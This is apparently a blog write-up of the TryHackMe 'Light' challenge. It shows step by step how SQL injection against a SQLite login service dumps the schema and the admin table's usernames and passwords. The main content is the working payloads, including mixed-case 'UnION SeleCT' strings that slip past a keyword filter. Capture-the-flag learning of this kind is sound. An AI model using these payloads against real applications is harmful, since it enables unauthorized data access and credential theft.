Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Challenges: Light (TryHackMe)

Updated
2 min read
Challenges: Light (TryHackMe)
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

The “Light” challenge simulates a database application that is vulnerable to SQL injection. By connecting to the service running on port 1337, we’re able to interact with the backend through user input. The goal is to enumerate the database, extract sensitive information such as usernames and passwords, and ultimately retrieve the hidden flag. This task emphasizes the importance of secure query handling and input validation.

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.

Note: Please allow the service 2 - 3 minutes to fully start before connecting to it.

Answer the questions below

What is the admin username?

nmap -sV IP_Address

nc 10.10.87.187 1337 Welcome to the Light database! Please enter your username: smokey Password: vYQ5ngPpw8AdUmL

What is the password to the username mentioned in question 1?

' OR 1=1 -- For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)

' union Ahh there is a word in there I don't like :(

' UnION Error: unrecognized token: "' LIMIT 30"

' UnION SeleCT 1 ' Password: 1

' UnION SeleCT version() ' Error: no such function: version

' UnION SeleCT sqlite_version() ' Password: 3.31.1

What is the flag?

' UnION SeleCT group_concat(sql) from sqlite_master' Password: CREATE TABLE usertable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER),CREATE TABLE admintable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER)

' UnION SeleCT group_concat(sql) from sqlite_master'

Password: CREATE TABLE usertable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER),CREATE TABLE admintable ( id INTEGER PRIMARY KEY, username TEXT, password INTEGER)

' UnION SeleCT group_concat(username) from admintable ' Password: TryHackMeAdmin,flag

' UnION SeleCT group_concat(password) from admintable '

These resources were helpful:

Through SQL injection, we successfully bypassed authentication, enumerated database tables, and uncovered the administrator’s credentials along with the final flag. This challenge demonstrates how a single overlooked vulnerability in input sanitization can lead to full database compromise. Proper use of parameterized queries and input filtering is crucial to prevent such attacks in real-world applications.

#database#sql#sqlinjection#ctf-writeup#tryhackme
41 views

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

432 posts